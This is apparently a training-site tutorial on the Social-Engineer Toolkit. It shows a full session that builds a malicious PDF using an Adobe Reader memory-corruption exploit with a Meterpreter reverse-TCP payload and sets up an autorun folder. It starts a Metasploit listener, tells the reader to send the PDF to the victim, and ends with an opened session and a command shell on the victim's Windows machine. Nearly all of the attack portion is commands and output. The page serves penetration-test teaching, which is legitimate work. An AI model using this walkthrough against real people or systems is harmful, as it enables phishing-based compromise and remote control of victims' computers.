SEToolkit

Description

SEToolkit is a Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

Example
Reverse Connection Using SET From A PDF

lhost is 192.168.1.8 and lport is 4444

                 .--.  .--. .-----.
                : .--': .--'`-. .-'
                `. `. : `;    : :
                 _`, :: :__   : :
                `.__.'`.__.'  :_;   

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]                Version: 6.0.5                    [---]
[---]             Codename: 'Rebellion'                [---]
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]

        Welcome to the Social-Engineer Toolkit (SET). 
         The one stop shop for all of your SE needs.

     Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set> 3

 The Infectious USB/CD/DVD module will create an autorun.inf file and a
 Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
 run if autorun is enabled.

 Pick the attack vector you wish to use: fileformat bugs or a straight executable.

   1) File-Format Exploits
   2) Standard Metasploit Executable

  99) Return to Main Menu

set:infectious>1
set:infectious> IP address for the reverse connection (payload):192.168.1.8

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   4) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   5) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   6) Adobe Flash Player "Button" Remote Code Execution
   7) Adobe CoolType SING Table "uniqueName" Overflow
   8) Adobe Flash Player "newfunction" Invalid Pointer Use
   9) Adobe Collab.collectEmailInfo Buffer Overflow
  10) Adobe Collab.getIcon Buffer Overflow
  11) Adobe JBIG2Decode Memory Corruption Exploit
  12) Adobe PDF Embedded EXE Social Engineering
  13) Adobe util.printf() Buffer Overflow
  14) Custom EXE to VBA (sent via RAR) (RAR required)
  15) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  16) Adobe PDF Embedded EXE Social Engineering (NOJS)
  17) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  18) Apple QuickTime PICT PnSize Buffer Overflow
  19) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  20) Adobe Reader u3D Memory Corruption Vulnerability
  21) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>20



   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2
set> IP address for the payload listener: 192.168.1.8
set:payloads> Port to connect back on [443]:4444
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the /home/cyborg/.set/template.pdf directory
[*] Your attack has been created in the SET home directory folder 'autorun'
[*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.
[-] Copy the contents of the folder to a CD/DVD/USB to autorun
set> Create a listener right now [yes|no]: yes

Now Send Template.pdf to the victim 

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V4                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           http://metasploit.pro


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1331 exploits - 721 auxiliary - 214 post        ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /home/cyborg/.set/meta_config for ERB directives.
resource (/home/cyborg/.set/meta_config)> use multi/handler
resource (/home/cyborg/.set/meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/home/cyborg/.set/meta_config)> set lhost 192.168.1.8
lhost => 192.168.1.8
resource (/home/cyborg/.set/meta_config)> set lport 4444
lport => 4444
resource (/home/cyborg/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/home/cyborg/.set/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) > 
[*] Started reverse handler on 192.168.1.8:4444 
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] Meterpreter session 1 opened (192.168.1.8:4444 -> 192.168.1.40:51775) at 2015-10-12 12:57:58 +0530
meterpreter > pwd
C:\Users\ztrela\Downloads
meterpreter > execute -f cmd.exe -i -H
Process 2148 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ztrela\Downloads
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?